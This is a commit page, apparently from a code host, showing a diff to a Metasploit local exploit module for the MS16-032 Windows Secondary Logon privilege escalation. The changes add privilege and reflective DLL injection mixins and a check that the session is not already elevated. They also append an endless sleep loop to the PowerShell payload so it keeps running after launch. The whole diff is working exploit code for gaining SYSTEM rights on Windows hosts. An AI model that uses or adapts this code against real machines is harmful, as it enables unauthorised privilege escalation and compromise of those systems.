Fix Payload exit issue
Fixed payload exiting issue by adding while ($true){Start-Sleep 1000};
statement.
This commit is contained in:
khr0x40sh
parent
40d7de05ef
commit
7211936f96
|
|
@ -12,7 +12,10 @@ class MetasploitModule < Msf::Exploit::Local
|
||||||
Rank = NormalRanking
|
Rank = NormalRanking
|
||||||
|
|
||||||
include Msf::Exploit::Powershell
|
include Msf::Exploit::Powershell
|
||||||
|
include Msf::Post::Windows::Priv
|
||||||
|
include Msf::Post::Windows::Process
|
||||||
include Msf::Post::File
|
include Msf::Post::File
|
||||||
|
include Msf::Post::Windows::ReflectiveDLLInjection
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(update_info(info,
|
super(update_info(info,
|
||||||
|
|
@ -83,7 +86,9 @@ This module exploits the lack of sanitization of standard handles in Windows' Se
|
||||||
end
|
end
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
|
if is_system?
|
||||||
|
fail_with(Failure::None, 'Session is already elevated')
|
||||||
|
end
|
||||||
arch1 = check
|
arch1 = check
|
||||||
if arch1 == nil
|
if arch1 == nil
|
||||||
print_error("Architecture could not be determined.")
|
print_error("Architecture could not be determined.")
|
||||||
|
|
@ -95,6 +100,7 @@ This module exploits the lack of sanitization of standard handles in Windows' Se
|
||||||
vprint_status("PS1 loaded from #{ps_path}")
|
vprint_status("PS1 loaded from #{ps_path}")
|
||||||
ms16_032 = File.read(ps_path)
|
ms16_032 = File.read(ps_path)
|
||||||
cmdstr=expand_path('%windir%') << '\\System32\\windowspowershell\\v1.0\\powershell.exe'
|
cmdstr=expand_path('%windir%') << '\\System32\\windowspowershell\\v1.0\\powershell.exe'
|
||||||
|
|
||||||
if datastore['TARGET'] == 0 && arch1 == ARCH_X86_64
|
if datastore['TARGET'] == 0 && arch1 == ARCH_X86_64
|
||||||
cmdstr.gsub!("System32","SYSWOW64")
|
cmdstr.gsub!("System32","SYSWOW64")
|
||||||
print_warning("Executing 32-bit payload on 64-bit ARCH, using SYSWOW64 powershell")
|
print_warning("Executing 32-bit payload on 64-bit ARCH, using SYSWOW64 powershell")
|
||||||
|
|
@ -106,7 +112,7 @@ This module exploits the lack of sanitization of standard handles in Windows' Se
|
||||||
payl.sub!(/.*?(?=New-Object IO)/im, "")
|
payl.sub!(/.*?(?=New-Object IO)/im, "")
|
||||||
payl = payl.split("';$s.")[0]
|
payl = payl.split("';$s.")[0]
|
||||||
payl.gsub!("''","'")
|
payl.gsub!("''","'")
|
||||||
payl = "$s=#{payl}"
|
payl = "$s=#{payl}while($true){Start-Sleep 1000};"
|
||||||
|
|
||||||
@upfile=Rex::Text.rand_text_alpha((rand(8)+6))+".txt"
|
@upfile=Rex::Text.rand_text_alpha((rand(8)+6))+".txt"
|
||||||
path = datastore['W_PATH'] || pwd
|
path = datastore['W_PATH'] || pwd
|
||||||
|
|
@ -146,7 +152,6 @@ This module exploits the lack of sanitization of standard handles in Windows' Se
|
||||||
rescue
|
rescue
|
||||||
print_error("An error occurred executing the script.")
|
print_error("An error occurred executing the script.")
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
def cleanup
|
def cleanup
|
||||||
|
|
@ -161,5 +166,4 @@ This module exploits the lack of sanitization of standard handles in Windows' Se
|
||||||
print_error("There was an issue with cleanup of the powershell payload script.")
|
print_error("There was an issue with cleanup of the powershell payload script.")
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue